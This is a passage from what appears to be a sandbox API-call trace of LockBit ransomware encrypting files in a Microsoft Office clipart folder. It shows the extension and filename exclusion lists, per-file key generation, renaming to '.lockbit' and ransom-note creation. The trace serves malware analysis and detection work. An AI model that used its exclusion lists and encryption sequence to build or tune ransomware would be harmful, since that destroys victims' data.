returned -1 [0103.349] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0103.349] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0103.349] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0103.349] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0103.349] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0103.349] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0103.349] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0103.349] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0103.349] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0103.349] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0103.349] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0103.349] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0103.349] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0103.349] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0103.349] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0103.349] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0103.349] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0103.349] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF.lockbit") returned 72 [0103.349] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04267_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xf00 [0103.350] CreateIoCompletionPort (FileHandle=0xf00, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0103.350] malloc (_Size=0x40068) returned 0x3ef0008 [0103.350] GetFileSizeEx (in: hFile=0xf00, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=7804) returned 1 [0103.350] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.351] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.351] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0103.351] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.351] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.351] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0103.351] ReadFile (in: hFile=0xf00, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0103.358] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0103.358] malloc (_Size=0xa6) returned 0x77d800 [0103.358] NtSetInformationFile (FileHandle=0xf00, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0103.358] free (_Block=0x77d800) [0103.358] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0103.358] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0103.359] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0103.359] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x513d5e50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x7e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AN04269_.WMF", cAlternateFileName="")) returned 1 [0103.368] lstrcmpiW (lpString1=".", lpString2="AN04269_.WMF") returned -1 [0103.368] lstrcmpiW (lpString1="..", lpString2="AN04269_.WMF") returned -1 [0103.368] PathFindExtensionW (pszPath="AN04269_.WMF") returned=".WMF" [0103.368] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0103.368] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0103.368] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0103.368] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0103.368] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0103.368] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0103.368] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0103.368] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0103.368] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0103.368] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0103.368] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0103.368] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0103.369] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0103.369] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0103.369] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0103.369] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0103.369] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0103.369] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0103.369] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0103.369] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0103.369] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0103.369] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0103.369] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0103.369] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0103.369] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0103.369] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0103.369] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0103.369] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0103.369] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0103.369] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0103.369] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0103.369] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0103.369] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0103.369] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0103.369] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0103.370] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0103.370] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0103.370] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0103.370] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0103.370] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0103.370] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0103.370] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0103.370] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0103.370] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0103.370] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0103.370] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0103.370] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0103.370] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AN04269_.WMF") returned 1 [0103.370] lstrcmpiW (lpString1="ntldr", lpString2="AN04269_.WMF") returned 1 [0103.370] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AN04269_.WMF") returned 1 [0103.370] lstrcmpiW (lpString1="bootsect.bak", lpString2="AN04269_.WMF") returned 1 [0103.370] lstrcmpiW (lpString1="autorun.inf", lpString2="AN04269_.WMF") returned 1 [0103.370] lstrcmpiW (lpString1="thumbs.db", lpString2="AN04269_.WMF") returned 1 [0103.370] lstrcmpiW (lpString1="iconcache.db", lpString2="AN04269_.WMF") returned 1 [0103.370] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0103.370] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF") returned=".WMF" [0103.370] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0103.371] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0103.371] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0103.371] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0103.371] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0103.371] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0103.371] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0103.371] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0103.371] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0103.371] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0103.371] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0103.371] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0103.371] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0103.371] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0103.371] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0103.371] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0103.371] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0103.371] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0103.371] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0103.371] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0103.371] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0103.371] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0103.371] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0103.372] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0103.372] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0103.372] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0103.372] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0103.372] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0103.372] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF.lockbit") returned 72 [0103.372] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04269_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0103.373] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0103.373] malloc (_Size=0x40068) returned 0x1ff1e60 [0103.373] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=2016) returned 1 [0103.373] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.373] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.374] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0103.374] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.374] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.374] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0103.374] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0103.377] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0103.377] malloc (_Size=0xa6) returned 0x77d800 [0103.377] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0103.378] free (_Block=0x77d800) [0103.378] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0103.378] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0103.378] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0103.378] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5eb8e810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x9bc, dwReserved0=0x0, dwReserved1=0x0, cFileName="AN04323_.WMF", cAlternateFileName="")) returned 1 [0103.378] lstrcmpiW (lpString1=".", lpString2="AN04323_.WMF") returned -1 [0103.378] lstrcmpiW (lpString1="..", lpString2="AN04323_.WMF") returned -1 [0103.378] PathFindExtensionW (pszPath="AN04323_.WMF") returned=".WMF" [0103.378] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0103.378] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0103.379] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0103.379] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0103.379] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0103.379] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0103.379] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0103.379] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0103.379] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0103.379] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0103.379] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0103.379] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0103.379] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0103.379] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0103.379] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0103.379] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0103.379] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0103.379] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0103.379] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0103.379] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0103.379] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0103.379] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0103.380] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0103.380] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0103.380] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0103.380] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0103.380] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0103.380] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0103.380] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0103.380] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0103.380] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0103.380] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0103.380] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0103.380] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0103.380] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0103.380] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0103.380] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0103.380] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0103.380] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0103.380] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0103.380] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0103.381] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0103.381] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0103.381] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0103.381] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0103.381] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0103.381] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0103.381] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AN04323_.WMF") returned 1 [0103.381] lstrcmpiW (lpString1="ntldr", lpString2="AN04323_.WMF") returned 1 [0103.381] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AN04323_.WMF") returned 1 [0103.381] lstrcmpiW (lpString1="bootsect.bak", lpString2="AN04323_.WMF") returned 1 [0103.381] lstrcmpiW (lpString1="autorun.inf", lpString2="AN04323_.WMF") returned 1 [0103.381] lstrcmpiW (lpString1="thumbs.db", lpString2="AN04323_.WMF") returned 1 [0103.381] lstrcmpiW (lpString1="iconcache.db", lpString2="AN04323_.WMF") returned 1 [0103.381] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0103.381] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF") returned=".WMF" [0103.381] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0103.381] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0103.381] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0103.381] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0103.381] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0103.381] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0103.381] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0103.381] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0103.381] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0103.382] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0103.382] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0103.382] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0103.382] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0103.382] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0103.382] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0103.382] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0103.382] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0103.382] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0103.382] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0103.382] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0103.382] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0103.382] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0103.382] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0103.382] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0103.382] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0103.382] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0103.382] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0103.382] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0103.382] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF.lockbit") returned 72 [0103.383] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04323_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x81c [0103.410] CreateIoCompletionPort (FileHandle=0x81c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0103.410] malloc (_Size=0x40068) returned 0x1ff1e60 [0103.410] GetFileSizeEx (in: hFile=0x81c, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=2492) returned 1 [0103.410] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.411] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.411] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0103.411] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.411] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.411] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0103.411] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0103.413] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0103.413] malloc (_Size=0xa6) returned 0x77d800 [0103.414] NtSetInformationFile (FileHandle=0x81c, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0103.414] free (_Block=0x77d800) [0103.414] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0103.415] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0103.415] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0103.415] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5eb8e810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xd14, dwReserved0=0x0, dwReserved1=0x0, cFileName="AN04326_.WMF", cAlternateFileName="")) returned 1 [0103.415] lstrcmpiW (lpString1=".", lpString2="AN04326_.WMF") returned -1 [0103.415] lstrcmpiW (lpString1="..", lpString2="AN04326_.WMF") returned -1 [0103.415] PathFindExtensionW (pszPath="AN04326_.WMF") returned=".WMF" [0103.415] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0103.415] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0103.415] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0103.415] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0103.415] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0103.415] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0103.415] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0103.415] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0103.415] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0103.415] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0103.415] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0103.415] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0103.415] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0103.416] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0103.416] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0103.416] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 